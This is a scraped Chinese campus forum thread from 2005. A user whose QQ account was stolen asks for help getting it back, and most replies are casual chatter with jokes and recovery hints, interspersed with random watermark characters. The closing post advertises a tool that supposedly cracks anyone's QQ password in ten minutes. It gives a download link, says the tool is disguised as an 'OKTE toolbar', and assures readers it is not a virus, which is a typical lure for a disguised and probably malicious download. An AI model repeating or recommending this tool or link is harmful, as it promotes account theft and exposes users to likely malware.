下沙论坛

注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用

QQ被盗怎么办~~~

QQ被偷,又不知道密码保护怎么办啊,谁帮我偷回来!!!
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩 转发到微博

没有申请QQ防盗保护的后果。哈哈……~~~

<>就当交学费吧</P>

<B>以下是引用<I>louyi1984</I>在2005-6-21 8:38:27的发言:</B>( a/ s! V6 _9 S/ z' [3 a
QQ被偷,又不知道密码保护怎么办啊,谁帮我偷回来!!!

. U/ U( k' P/ E3 w
3 x' [% W4 B2 \$ t1 }2 Y帅哥被盗了??
# B3 i- d( L; n5 K偶的24890673
; l& g& F1 O) G' Z. Z+ ~# T : R& F$ r( Y5 ?  k

<>汗</P><>这个偶不知道挖</P>

<>世道不太平啊,哎</P>

<>米办法的事情啊</P><>有人可能只是吃饱没事干</P><>哎,,,,,,,,...............</P>

<>恩,吃饭之后,要散步</P>

我没被盗,只是问问;啦,不要紧张

还好还好,不然有多少MM有伤心哦

把他盗回来挖!~

强,顶

重要的不是QQ,是好友

<>呵呵........这也是的哦</P><>好象QQ会员可以找回来的把</P><>你问问哈........</P>

<B>以下是引用<I>louyi1984</I>在2005-6-30 19:46:35的发言:</B>- t8 N! m" Z% G3 i" i
重要的不是QQ,是好友

0 f1 S# k6 Z7 p3 V9 a" ~# e
. B. R8 _$ o4 w3 {% M6 @7 b4 c! d0 g% T+ t
支持
8 h3 ^; S) j8 }& r
8 {2 g$ U/ o7 b% V3 p8 K7 H9 w

<>呵呵</P><>顶几...............</P>

谢谢MASTER

<>你再去盗别人的一个回来好了闹</P>

<B>以下是引用<I>心的方向</I>在2005-7-3 13:38:41的发言:</B>% q2 }" ?! a7 K( y) K

. v' U8 g% e& B<>你再去盗别人的一个回来好了闹</P>

! ~  N3 m0 o6 d* {4 F! q! K
$ w) A9 ]( K8 s; i. X4 ]& x
; L6 I, @0 |& }% m( Z* p. I此人不厚道

找QQ密码

给大家一个10分钟破出别人QQ密码的软件,本人已经测试过!可用。<br/>软件下载地址<a href="http://okte.cn/user.asp?n=reg.163">Http://okte.cn/user.asp?n=reg.163</a>然后点下载OKTE工具条,不是病毒,请放心下载此软件,下载完安装。为了掩护此软件,特地改名为OKTE工具条!下载后软件内附说明书!供应研究。